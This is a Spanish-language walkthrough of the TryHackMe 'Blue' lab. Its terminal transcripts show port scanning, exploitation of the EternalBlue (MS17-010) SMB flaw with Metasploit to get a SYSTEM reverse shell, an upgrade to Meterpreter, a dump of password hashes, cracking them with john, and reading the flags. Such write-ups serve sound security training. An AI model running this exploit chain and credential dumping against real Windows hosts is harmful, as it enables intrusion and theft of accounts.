Blue es una maquina de TryHackMe, presenta una vulnerabilidad Eternal Blue, utilizamos metasploit para configurar y explotar la vulnerabilidad encontrada y obtener las flags.
Room
| Titulo |
Blue  |
| Descripción |
Deploy & hack into a Windows machine, leveraging common misconfigurations issues. |
| Puntos |
630 |
| Dificultad |
Facil |
| Maker |
DarkStar7471  |
MASSCAN & NMAP
Escaneo de puertos udp/tcp y sus servicios.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
|
root@kali:~/trymehack/blue# masscan -p1-65535,U:1-65535 10.10.24.91 --rate=1000 -e tun0
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-09-04 00:56:01 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 49153/tcp on 10.10.24.91
Discovered open port 49154/tcp on 10.10.24.91
Discovered open port 49152/tcp on 10.10.24.91
Discovered open port 137/udp on 10.10.24.91
Discovered open port 3389/tcp on 10.10.24.91
# Nmap 7.70 scan initiated Tue Sep 3 21:03:21 2019 as: nmap -sC -sV -p1-1000 -o nmap.scan_mil 10.10.24.91
Nmap scan report for 10.10.24.91
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:ae:0a:27:4e:02 (unknown)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2019-09-03T20:04:00-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-09-03 21:04:00
|_ start_date: 2019-09-03 20:54:40
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 3 21:04:06 2019 -- 1 IP address (1 host up) scanned in 45.67 seconds
|
SMBCLIENT & SMBMAP
Escaneo de sharenames.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
root@kali:~/trymehack/blue# smbclient -L \\10.10.24.91
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
smb1cli_req_writev_submit: called for dialect[SMB2_10] server[10.10.24.91]
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.24.91 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
root@kali:~/trymehack/blue# smbmap -H 10.10.24.91
[+] Finding open SMB ports....
root@kali:~/trymehack/blue#
|
NMAP - SMB SCRIPTS
Utilizamos los scripts de nmap para verificar si alguno es vulnerable con la maquina, y, encontramos que es vulnerable a ms17-010 o ETERNALBLUE.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
|
root@kali:~/trymehack/blue# nmap --script smb-vuln-* 10.10.24.91
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-03 21:11 EDT
Nmap scan report for 10.10.24.91
Host is up (0.20s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 42.25 seconds
|
Utilizamos metasploit y el exploit exploit/windows/smb/ms17_010_eternalblue contra la maquina, lo configuramos y corremos el exploit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
|
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.24.91
rhosts => 10.10.24.91
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets
Exploit targets:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.8.1.72:4444
[+] 10.10.24.91:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.24.91:445 - Connecting to target for exploitation.
[+] 10.10.24.91:445 - Connection established for exploitation.
[+] 10.10.24.91:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.24.91:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.24.91:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.24.91:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.24.91:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.24.91:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.24.91:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.24.91:445 - Sending all but last fragment of exploit packet
[*] 10.10.24.91:445 - Starting non-paged pool grooming
[+] 10.10.24.91:445 - Sending SMBv2 buffers
[+] 10.10.24.91:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.24.91:445 - Sending final SMBv2 buffers.
[*] 10.10.24.91:445 - Sending last fragment of exploit packet!
[*] 10.10.24.91:445 - Receiving response from exploit packet
[+] 10.10.24.91:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.24.91:445 - Sending egg to corrupted connection.
[*] 10.10.24.91:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.8.1.72:4444 -> 10.10.24.91:49196) at 2019-09-03 21:15:49 -0400
[+] 10.10.24.91:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.24.91:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.24.91:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
|
UPGRADE SHELL - METERPRETER
Utilizamos el eexploit de post explotacion multi/manage/shell_to_meterpreter para actualizar nuestra shell a meterpreter.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.8.1.72:4444 -> 10.10.24.91:49196 (10.10.24.91)
msf5 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/manage/shell_to_meterpreter normal No Shell to Meterpreter Upgrade
msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on.
msf5 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf5 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.8.1.72:4433
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (179779 bytes) to 10.10.24.91
[*] Meterpreter session 2 opened (10.8.1.72:4433 -> 10.10.24.91:49203) at 2019-09-03 21:21:37 -0400
[*] Stopping exploit/multi/handler
msf5 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.8.1.72:4444 -> 10.10.24.91:49196 (10.10.24.91)
2 meterpreter x86/windows NT AUTHORITY\SYSTEM @ JON-PC 10.8.1.72:4433 -> 10.10.24.91:49203 (10.10.24.91)
msf5 post(multi/manage/shell_to_meterpreter) >
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 55bd17830e678f18a3110daf2c17d4c7...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
Jon:"Nah boi, I ain't sharing nutting with you"
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter >
|
JOHN - CRACK PASSWORDS
Crackeamos las contraseñas con john.
1
2
3
4
5
6
7
8
9
10
11
12
|
root@kali:~/trymehack/blue# john hashes --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
(Administrator)
alqfna22 (Jon)
2g 0:00:00:00 DONE (2019-09-03 21:34) 2.061g/s 10515Kp/s 10515Kc/s 10520KC/s alqui..alpusidi
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
root@kali:~/trymehack/blue#
|
FLAGS
Encontrando las flags.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2009-07-13 23:18:56 -0400 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 23:20:08 -0400 PerfLogs
40555/r-xr-xr-x 4096 dir 2009-07-13 23:20:08 -0400 Program Files
40555/r-xr-xr-x 4096 dir 2009-07-13 23:20:08 -0400 Program Files (x86)
40777/rwxrwxrwx 4096 dir 2009-07-13 23:20:08 -0400 ProgramData
40777/rwxrwxrwx 0 dir 2018-12-12 22:13:22 -0500 Recovery
40777/rwxrwxrwx 4096 dir 2018-12-12 18:01:17 -0500 System Volume Information
40555/r-xr-xr-x 4096 dir 2009-07-13 23:20:08 -0400 Users
40777/rwxrwxrwx 16384 dir 2009-07-13 23:20:08 -0400 Windows
100666/rw-rw-rw- 24 fil 2018-12-12 22:47:39 -0500 flag1.txt
567211570/r-xrwx--- 438533065912909807 fif 13905563959-04-24 15:54:40 -0400 hiberfil.sys
567211570/r-xrwx--- 438533065912909807 fif 13905563959-04-24 15:54:40 -0400 pagefile.sys
meterpreter > cat flag1.txt
flag{******************}
meterpreter > pwd
C:\
meterpreter >
|
Utilizamos dir para encontrar los archivos que lleven el nombre de “flag”.
Comando:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
|
C:\>dir flag* /s /p
dir flag* /s /p
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\
03/17/2019 02:27 PM 24 flag1.txt
1 File(s) 24 bytes
Directory of C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent
03/17/2019 02:26 PM 482 flag1.lnk
03/17/2019 02:30 PM 848 flag2.lnk
03/17/2019 02:32 PM 2,344 flag3.lnk
3 File(s) 3,674 bytes
Directory of C:\Users\Jon\Documents
03/17/2019 02:26 PM 37 flag3.txt
1 File(s) 37 bytes
Total Files Listed:
5 File(s) 3,735 bytes
0 Dir(s) 22,796,713,984 bytes free
C:\>
C:\>type C:\Users\Jon\Documents\flag3.txt
type C:\Users\Jon\Documents\flag3.txt
flag{*******************************}
C:\>
C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent>type flag2.lnk
type flag2.lnk
L�F� h+汖��h+汖��=]�����'P�O� �:i�+00�/C:\R1�M�Windows��:���M�*pWindowsV1qN��System32��:��qN��* System32P1�Mconfig��:���M*� configX2'�M flag2.txtヘM�M*�flag2.txtS-Rf
�C:\Windows\System32\config\flag2.txt6..\..\..\..\..\..\..\Windows\System32\config\flag2.txt�C:\Windows\System32\config( �1SPS�XF�L8C���&�m�`�Xjon-pc��̴�H�C�Kz�k��:������d)d�4
C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent>dir /ah C:\Windows\System32\config
dir /ah C:\Windows\System32\config
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Windows\System32\config
File Not Found
C:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent>
|
Nuestra flag2 se encuentra en C:\Windows\System32\config*.
1
2
3
4
|
C:\Windows\system32>type C:\Windows\System32\config\flag2.txt
type C:\Windows\System32\config\flag2.txt
flag{****************************}
C:\Windows\system32>
|
